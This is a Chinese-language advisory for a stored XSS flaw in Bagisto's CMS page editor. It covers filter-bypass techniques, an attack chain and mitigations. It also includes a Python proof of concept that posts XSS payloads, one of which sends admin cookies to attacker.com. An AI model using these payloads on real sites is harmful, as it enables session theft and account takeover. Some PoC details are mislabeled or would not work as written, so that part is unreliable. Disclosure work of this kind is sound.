CVE-2026-21451 Bagisto CMS页面编辑器存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-21451

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

8.4 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Bagisto

漏洞概述

CVE-2026-21451是Bagisto开源Laravel电商平台中存在的一个高危存储型跨站脚本(XSS)漏洞。该漏洞位于CMS页面编辑器功能中，影响2.3.10之前的所有版本。攻击者可以通过操纵原始HTTP POST请求来绕过平台的<script>标签过滤机制，从而在CMS内容中注入任意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在数据库中，当管理员或其他用户查看或编辑受感染的CMS页面时，恶意代码会自动执行。此漏洞具有极高的危害性，攻击成功可能导致管理员账户完全被接管、后台系统被劫持、敏感数据泄露以及进一步的横向移动攻击。Bagisto官方已在2.3.10版本中修复此安全问题，建议所有用户立即升级。

技术细节

该漏洞的根本原因在于Bagisto的CMS页面编辑器对用户输入的过滤机制存在缺陷。平台虽然实现了基本的<script>标签过滤功能，但攻击者可以通过以下方式绕过：1) 使用大小写混合的脚本标签如<ScRiPt>；2) 利用HTML实体编码如<script>；3) 在标签属性中注入事件处理器如<img src=x onerror=alert(1)>；4) 操纵HTTP POST请求的原始数据，添加额外的编码层或分块传输来绕过前端验证。由于CMS内容会被存储到数据库中且在页面渲染时直接输出而缺乏足够的输出编码，恶意脚本得以执行。攻击者利用此漏洞可窃取管理员会话Cookie、劫持后台管理权限、修改CMS内容植入钓鱼页面或恶意链接，甚至通过XSS平台进一步探测内网环境。

攻击链分析

STEP 1

步骤1

攻击者获取Bagisto平台的管理员访问权限（通过默认凭证、暴力破解或其他方式）

STEP 2

步骤2

攻击者登录后台管理系统，导航至CMS页面编辑器功能

STEP 3

步骤3

攻击者构造包含XSS payload的恶意请求，使用HTML编码、大小写混合或事件处理器等方式绕过<script>标签过滤

STEP 4

步骤4

通过操纵原始HTTP POST请求发送payload，恶意内容被存储到数据库中

STEP 5

步骤5

当管理员或用户访问或编辑受感染的CMS页面时，恶意JavaScript代码在受害者浏览器中执行

STEP 6

步骤6

攻击者利用XSS窃取管理员会话Cookie、劫持账户、修改网站内容或进行进一步内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2026-21451 PoC - Stored XSS in Bagisto CMS Page Editor
# Target: Bagisto < 2.3.10
# Author: Security Research

TARGET_URL = "http://target-site.com/admin/cms/pages"
LOGIN_URL = "http://target-site.com/admin/login"
USERNAME = "admin"
PASSWORD = "admin123"

session = requests.Session()

def login():
    """Authenticate to Bagisto admin panel"""
    login_data = {
        'email': USERNAME,
        'password': PASSWORD
    }
    response = session.post(LOGIN_URL, data=login_data)
    return 'admin' in response.url or response.status_code == 200

def bypass_xss_filter():
    """Bypass script tag filtering via HTTP request manipulation"""
    # Method 1: HTML entity encoded script tag
    payload1 = '&lt;script&gt;alert(document.cookie)&lt;/script&gt;'
    
    # Method 2: Event handler injection
    payload2 = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>'
    
    # Method 3: Case mixing to bypass case-sensitive filters
    payload3 = '<ScRiPt>alert("XSS")</ScRiPt>'
    
    # Method 4: Data URI protocol
    payload4 = '<svg onload=alert(1)>'
    
    return [payload1, payload2, payload3, payload4]

def inject_xss():
    """Inject XSS payload into CMS page content"""
    payloads = bypass_xss_filter()
    
    for i, payload in enumerate(payloads):
        cms_data = {
            'page': {
                'title': f'PoC Page {i+1}',
                'html_content': f'<div>{payload}</div>',
                'channels': [1],
                'locale': 'en'
            }
        }
        
        # Send raw HTTP POST with manipulated content-type
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'X-Requested-With': 'XMLHttpRequest'
        }
        
        response = session.post(TARGET_URL, data=cms_data, headers=headers)
        
        if response.status_code == 200 or response.status_code == 201:
            print(f"[+] Payload {i+1} sent successfully")
        else:
            print(f"[-] Payload {i+1} failed with status {response.status_code}")

if __name__ == "__main__":
    print("[*] CVE-2026-21451 Bagisto Stored XSS PoC")
    print("[*] Target: ", TARGET_URL)
    
    if login():
        print("[+] Login successful")
        inject_xss()
        print("[*] XSS payloads sent. Check CMS pages for execution.")
    else:
        print("[-] Login failed")

影响范围

Bagisto < 2.3.10

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 限制CMS编辑器功能的使用权限，仅允许可信管理员使用；2) 在Web应用防火墙(WAF)层面配置XSS防护规则，拦截包含可疑payload的请求；3) 实施严格的HTTP头安全策略，包括Content-Security-Policy和X-XSS-Protection；4) 监控和审计CMS页面的变更记录；5) 考虑暂时禁用CMS页面编辑器功能，待官方修复后再启用。